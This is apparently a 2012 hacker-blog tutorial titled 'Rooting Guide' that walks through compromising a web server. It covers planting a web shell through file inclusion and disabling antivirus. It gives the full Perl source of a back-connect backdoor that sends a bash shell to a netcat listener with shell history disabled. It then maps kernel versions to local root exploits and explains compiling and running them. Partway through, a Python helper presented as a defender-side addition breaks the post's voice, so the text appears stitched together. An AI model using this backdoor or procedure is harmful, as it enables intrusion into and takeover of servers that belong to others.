BLACK BURN HACKER. Powered by Blogger.



Saturday, January 28, 2012

Rooting Guide


Shell access on the website is the first thing you will need. How you gain this access
is entirely up to you. I would say most people will end up going with a simple remote
file inclusion and placing a c99, r57, Locust or any other shell of your choice.

You will want to get yourself a version of Netcat, which you can find at this location

If you have an antivirus that auto-deletes infected files or viruses, I would suggest disabling
it, as some AVs will detect Netcat as a hacktool or remote admin tool. Once you have downloaded
Netcat, open it up and it will ask you to enter a string for the command line. Reading up on
Netcat is recommended, but if you're lazy a string like this will do just fine:

-vv -l -n -p 

From there you will want to acquire a nice back-connect. I prefer to use one that's not
built into the shell, because I find that those back-connects work poorly, so I will provide you
with the one that I use. It is very simple to use: just save it as "", then upload it to the server
and execute it.


use IO::Socket;
use Socket;
use FileHandle;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
#lord@SlackwareLinux:/home/programing$ perl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#Usage: [Host] [Port]
#Ex: 2121
#lord@SlackwareLinux:/home/programing$ perl 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#[*] Resolving HostName
#[*] Connecting...
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [] from localhost [] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#uid=1001(lord) gid=100(users) groups=100(users)
$system = '/bin/bash';
$ARGC = @ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC != 2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 2121 \n";
}
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
open(STDIN, ">&SOCKET");
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");

**Note that if you are behind a router or on wireless with multiple IPs assigned by DHCP, you might have to
forward the port to whatever the IP of your computer is. You can check this by opening a
command prompt and typing ipconfig; the IP it reports is the one to forward to.
If you are unsure about how to forward your port, check out this site and
find your router model.

So now that you have your tools and your shell access, open up Netcat and type in -vv -l -n -p 8080.
For this tutorial we will connect on port 8080. Hit enter and it should start listening.

Go back to the server, upload your back-connect, and execute it with a command such as perl 8080.
Once you execute this you can go back to the Netcat shell and it should have connected. With this particular back-connect
you don't have to find the kernel version, because it displays it for you once it connects, but for those of you who
are using a different back-connect, to find the OS, kernel version and user ID you can type something like this into the
shell and it will give you the info:

uname -a;id

Once executed you will see something probably similar to

Linux 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The important information here is the OS and kernel version, which in this case is
Linux with kernel version 2.6.8-2. You can see that its last update was in 2005, so it's fairly
old, which is a good thing for us.

Here is a kernel reference for you all; it will tell you what exploits work for the different kernels,
just to give you a general idea. Note that this reference is kind of old but is still pretty accurate, and
there could be newer exploits now.

2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_fucked_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
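As an added, defender-side example (not code from the original post): a small Python helper that pulls the kernel release out of a uname -a line and looks it up in the reference list above, so you can check whether a box you administer still runs a kernel that appears on this list. The reference is re-typed from the post; reading it by longest matching prefix (2.6.8-2 hits the 2.6.8 entry, not 2.6.8-5) and by inclusive range for the "a - b" entries is my assumption about how the list is meant to be used.

```python
import re

# Kernel reference list re-typed from the post above, ';'-separated. Entries such as
# "2.6.23 - 2.6.24" are inclusive ranges; the names are only the post's exploit nicknames.
REFERENCE = (
    "2.2 -> ptrace; 2.4.17 -> newlocal, kmod, uselib24; 2.4.18 -> brk, brk2, newlocal, kmod; "
    "2.4.19 -> brk, brk2, newlocal, kmod; 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2; "
    "2.4.21 -> brk, brk2, ptrace, ptrace-kmod; 2.4.22 -> brk, brk2, ptrace, ptrace-kmod; "
    "2.4.22-10 -> loginx; 2.4.23 -> mremap_pte; 2.4.24 -> mremap_pte, uselib24; "
    "2.4.25-1 -> uselib24; 2.4.27 -> uselib24; 2.6.2 -> mremap_pte, krad, h00lyshit; "
    "2.6.5 -> krad, krad2, h00lyshit; 2.6.6 -> krad, krad2, h00lyshit; 2.6.7 -> krad, krad2, h00lyshit; "
    "2.6.8 -> krad, krad2, h00lyshit; 2.6.8-5 -> krad2, h00lyshit; 2.6.9 -> krad, krad2, h00lyshit; "
    "2.6.9-34 -> r00t, h00lyshit; 2.6.10 -> krad, krad2, h00lyshit; "
    "2.6.13 -> raptor, raptor2, h0llyshit, prctl; 2.6.14 -> raptor, raptor2, h0llyshit, prctl; "
    "2.6.15 -> raptor, raptor2, h0llyshit, prctl; 2.6.16 -> raptor, raptor2, h0llyshit, prctl; "
    "2.6.23 - 2.6.24 -> diane_lane_fucked_hard.c; 2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c"
)

def version_tuple(ver):
    """'2.6.8-2' -> (2, 6, 8, 2); tuples compare the way release numbers sort."""
    return tuple(int(p) for p in re.split(r"[.-]", ver))

def parse_reference(text=REFERENCE):
    """Split the list into exact entries {version_tuple: names} and ((low, high), names) ranges."""
    exact, ranges = {}, []
    for entry in text.split(";"):
        key, names = (s.strip() for s in entry.split("->"))
        names = [n.strip() for n in names.split(",")]
        if " - " in key:  # assumed reading: "a - b" is an inclusive range
            low, high = key.split(" - ")
            ranges.append(((version_tuple(low), version_tuple(high)), names))
        else:
            exact[version_tuple(key)] = names
    return exact, ranges

def kernel_release(uname_line):
    """First version-like token in a 'uname -a' line: 'Linux host 2.6.8-2-686-smp #1 ...' -> '2.6.8-2'."""
    m = re.search(r"\b\d+\.\d+(?:\.\d+)*(?:-\d+)?", uname_line)
    return m.group(0) if m else None

def listed_exploits(release):
    """Names the list gives for this release: the longest entry that is a prefix of it
    (assumed reading, so 2.6.8-2 hits 2.6.8, not 2.6.8-5) plus any range containing it; [] if unlisted."""
    exact, ranges = parse_reference()
    rel = version_tuple(release)
    prefixes = [k for k in exact if rel[:len(k)] == k]
    names = list(exact[max(prefixes, key=len)]) if prefixes else []
    for (low, high), more in ranges:
        if low <= rel <= high:
            names += more
    return names
```

An empty result only means the kernel is not on this 2005-era list, not that it is patched against anything newer.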

Once you have found the kernel version of the server you are about to root, you need to find the local root exploit
for that kernel, which you can find with Google using the list above. Once you have found your exploit you will want
to compile it, assuming it's in C, which most are. To compile your xpl.c, place it on the
server where you placed your shell and then compile it. To compile your C source, go to the shell that you have
spawned with Netcat and type:
gcc xpl.c -o xpl

This will compile your xpl.c to a file named xpl.

From here all you have to do is run your exploit, which can be done by simply typing into your Netcat connection


It should execute the exploit file which you have just compiled and give you root, depending on what the exploit requires.
Some require nothing but running them; others, such as h0llyshit, require a large file to exploit, or one to be made to exploit.
But this is just to explain how to root. You can read up on h0llyshit here if you would like.

©2011, copyright BLACK BURN



